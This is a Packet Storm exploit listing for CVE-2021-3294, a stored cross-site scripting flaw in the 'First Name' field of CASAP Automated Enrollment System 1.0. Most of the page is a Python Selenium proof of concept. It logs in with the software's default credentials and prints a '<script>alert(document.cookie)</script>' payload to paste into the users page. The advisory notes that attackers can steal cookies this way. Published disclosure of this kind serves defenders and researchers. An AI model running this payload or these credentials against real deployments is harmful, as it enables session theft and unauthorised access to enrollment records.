exploit the possibilities

CASAP Automated Enrollment System 1.0 Cross Site Scripting

CASAP Automated Enrollment System 1.0 Cross Site Scripting
Posted Feb 16, 2021
Authored by nu11secur1ty | Site nu11secur1ty.com

CASAP Automated Enrollment System version 1.0 First Name persistent cross site scripting exploit. Original discovery of persistent cross site scripting in this version is attributed to Richard Jones.

tags | exploit, xss
advisories | CVE-2021-3294
MD5 | 8bcbd0520b63bb4032dfd0ec22cdf8a6

CASAP Automated Enrollment System 1.0 Cross Site Scripting

Change Mirror Download
# Exploit Title: CASAP Automated Enrollment System 1.0 - 'First Name' Stored XSS
# Author: nu11secur1ty
# Date: 02.15.2021
# Vendor: https://www.sourcecodester.com/php/12210/casap-automated-enrollment-system.html
# Software Athor: https://www.sourcecodester.com/users/yna-ecole
# Link: https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-3294/CASAP.zip
# Link Original: https://www.sourcecodester.com/download-code?nid=12210&title=CASAP+Automated+Enrollment+System+using+PHP%2FMySQLi+with+Source+Code
# CVE: CVE-2021-3294


[+] Credits: (@ nu11secur1ty)
[+] Website: https://www.nu11secur1ty.com/
[+] Source:
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Exploit Program Code]
#!/usr/bin/python3
# author @nu11secur1ty
# For CVE-2021-3294

from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
import os


#enter the link to the website you want to automate login.
website_link="http://localhost/Final/index.php"

#enter your login username
username="yna.ecole"

#enter your login password
password="12345"


#enter the element for username input field
element_for_username="username"
#enter the element for password input field
element_for_password="password"
#enter the element for submit button
element_for_submit="login"


#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users

browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

exploit="nu11<script>alert(document.cookie)</script>"
print("If everything is ok, please paste this in to the Users in section in
First Name\n")
print(exploit)

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")

[Vendor]
https://www.sourcecodester.com/users/yna-ecole


[Vulnerability Type]
XSS

[CVE Reference]
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3294

[Security Issue]
CASAP Automated Enrollment System 1.0 is affected by cross-site scripting
(XSS) in users.php.
An attacker can steal a cookie to perform user redirection to a malicious
website.


[Video]
https://www.youtube.com/watch?v=_nhIZyJ8rxM


@nu11secur1ty
https://www.nu11secur1ty.com/
Login or Register to add favorites

File Archive:

August 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    1 Files
  • 2
    Aug 2nd
    7 Files
  • 3
    Aug 3rd
    5 Files
  • 4
    Aug 4th
    7 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close